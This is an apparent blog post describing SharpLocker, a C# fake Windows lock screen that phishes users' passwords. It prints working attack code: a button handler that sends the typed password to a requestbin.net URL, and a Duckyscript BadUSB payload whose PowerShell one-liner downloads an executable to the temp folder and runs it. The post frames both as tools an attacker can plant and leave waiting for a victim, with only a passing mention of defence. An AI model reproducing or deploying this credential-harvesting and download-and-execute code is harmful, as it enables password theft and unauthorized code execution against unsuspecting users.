This was a seriously fun project. SharpLocker simply put is a “fake windows lockscreen” program written in C#. When run, up pops what appears to be a windows lock screen prompt…

The lockscreen isn’t fully realistic, the power buttons are missing and if the resolution of the main monitor isn’t 1080p then things end up a little stretched. The username is fetched, however the user icon and background image are pre-determined. But it’s more than good enough to fool most.

The idea of this kind of hack is to create such an air of familiarity that an unwitting individual enters their password as a reflex to the prompt.

Any text entered is sent to the console, where a would be attacker is free to do what they will with it. However with a couple extra lines of code we can exfiltrate the “password” to a remote server. In the button click method…

private void button1_Click_1(object sender, EventArgs e)
{
    HttpWebRequest req = (HttpWebRequest)WebRequest.Create("http://requestbin.net/r/xxxxxxxx?" + textBox2.Text);
    req.GetResponse();
    Taskbar.Show();
    System.Windows.Forms.Application.Exit();
}

The added highlighted code takes the Textbox’s text and packages it into a GET request, sending it off to a requestbin bin.

Requestbin.net as they put it… “gives you a URL that will collect requests made to it and let you inspect them in a human-friendly way. Use RequestBin to see what your HTTP client is sending or to inspect and debug webhook requests.”

For example if randomtext! is entered into the password prompt. The URL http://requestbin.net/r/[unique]?randomtext! is visited by the program, thus creating the query we see above in our requestbin bin.

It’s a bit primitive, but it works.

Furthermore, you work this all into a Duckyscript, such that on the plugin of a BadUSB: a script is run which downloads the program and executes it within a fraction of a second. If you’re not familiar with BadUSBs see my explanation video.

DELAY 4000
GUI r
DELAY 150
STRING powershell (new-object System.Net.WebClient).DownloadFile('
REM ==== >URL BELOW< ====
STRING REPLACE_WITH_URL
REM ==== >URL ABOVE< ====
STRING ','%TEMP%\f.exe'); Start-Process "%TEMP%\f.exe"
ENTER

This duckyscript spawns a run prompt, a single line powershell script is then keyed in, which when run downloads the program and executes it, no frills. A would be attacker can then back away and wait for a victim to type in their password.

How can you protect against BadUSB attacks? I have a video on that.